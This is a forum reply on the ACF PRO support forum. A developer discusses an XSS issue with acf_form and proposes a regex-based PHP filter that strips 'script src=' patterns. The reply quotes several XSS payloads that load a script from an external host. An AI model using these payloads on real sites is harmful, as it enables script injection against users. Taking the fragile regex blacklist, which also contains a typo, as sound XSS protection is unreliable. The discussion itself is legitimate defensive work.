Home › Forums › ACF PRO › acf_form XSS Vulnerability › Reply To: acf_form XSS Vulnerability
After a bit more mucking about I can clarify the issue a bit.
"><script Src="//s1n.fr/s.js">
…so working as intended, I’m guessingacf_form
modified the post title and I was using get_the_title()
to render it on one page; this was somehow reversing my escaped entities (so I switched it to $post->post_title
instead)So I guess as a summary:
wp_kses
works great with acf_form
by stripping out the unwanted stuff when the html is correctly formed (i.e. <script src="//s1n.fr/s.js"></script>
)"><script src="//s1n.fr/s.js"<>>
), particular care has to be on how the stored value is rendered to make sure that the scripts aren’t getting decoded along with other entities that a developer may actually want to decode;
script src=
bit stead of the script ‘tags’ themselves (please see below)A new question:
would it be possible to run something like a preg_replace
for a pattern matching script src=
on all fields using something like acf/save_post
; any ideas on a best approach to this? …maybe something like:
function ns_kses_post( $value ) {
// is array
if( is_array($value) ) {
return array_map('ns_kses_post', $value);
};
// strip out potentially malformed/unclosed scripts for XSS prevention
$search = array('/script.*src=.*\/\/.*\.js/');
$replace = __('[Removed for security]','acf');
$replace_value = preg_replace($search,$replace,$value);
if($replace_value){
$replace_value = str_replace('<','<',$replace_value);
$replace_value = str_replace('>','&rt;',$replace_value);
$value = $replace_value;
};
// return
return wp_kses_post( $value );
}
add_filter('acf/update_value', 'ns_kses_post', 10, 1);
Welcome to the Advanced Custom Fields community forum.
Browse through ideas, snippets of code, questions and answers between fellow ACF users
Helping others is a great way to earn karma, gain badges and help ACF development!
We use cookies to offer you a better browsing experience, analyze site traffic and personalize content. Read about how we use cookies and how you can control them in our Privacy Policy. If you continue to use this site, you consent to our use of cookies.